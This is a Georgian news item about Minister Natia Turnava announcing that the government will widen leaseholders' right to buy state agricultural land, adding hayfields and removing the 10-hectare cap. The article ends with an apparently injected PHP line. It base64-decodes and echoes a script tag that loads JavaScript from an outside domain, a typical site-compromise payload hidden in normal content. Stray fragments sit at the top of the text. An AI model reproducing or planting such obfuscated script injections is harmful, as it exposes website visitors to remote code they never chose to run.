celsiusi
ავერსი შნაიდერი
ეკონომიკისა და მდგრადი განვითარების მინისტრის , ნათია თურნავას განცხადებით, საქართველოს მთავრობამ მიიღო  გადაწყვეტილება და ცვლილებები შეიტანა სასოფლო-სამეურნეო დანიშნულების მიწის რესურსზე ხელმისაწვდომობის პროგრამაში. 
თურნავას თქმით, სახელმწიფოს მიერ  იჯარით გაცემულ  „სახნავი“ კატეგორიის მიწის ნაკვეთებს, რომელთა გამოსყიდვაც შეუძლიათ მეიჯარეებს, დაემატა „სათიბი“ მიწების კატეგორიაც, ასევე მოიხსნა შეზღუდვა, რომელიც მოიჯარეებისთვის მხოლოდ 10 ჰა-მდე ფართობის მიწის ნაკვეთის გამოსყიდვის უფლებას ითვალისწინებდა. 
 
„პოსტპანდემიურ პერიოდში ჩვენი მთავარი ამოცანა არის, რომ რაც შეიძლება მეტი ქონება იყოს ჩართული ეკონომიკაში, ქმნიდეს დოვლათს და ასაქმებდეს ადამიანებს. მთავრობის დღევანდელ სხდომაზე მივიღეთ ძალიან მნიშვნელოვანი გადაწყვეტილება - ფართოვდება ის მექანიზმი, რომლითაც მოიჯარეები შეიძენენ და გამოისყიდიან სასოფლო-სამეურნეო მიწის ნაკვეთებს, რაზეც წლების განმავლობაში, იჯარის პროცესში აქვთ გაშენებული მრავალწლიანი ნარგავები, ამუშავებენ მიწებს, მაგრამ, სამწუხაროდ, იმის გამო, რომ ეს არის სახელმწიფო საკუთრება და მხოლოდ იჯარის ხელშეკრულება აქვთ ხელთ, არ შეუძლიათ საბანკო დაფინანსების მოზიდვა, ასევე შეზღუდულები არიან,  რომ  მონაწილეობა მიიღონ სახელმწიფო პროგრამებში და შესაბამისად, უფრო ეფექტიანად გამოიყენონ ეს სიკეთე“, - აღნიშნა ნათია თურნავამ.
 
1904
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");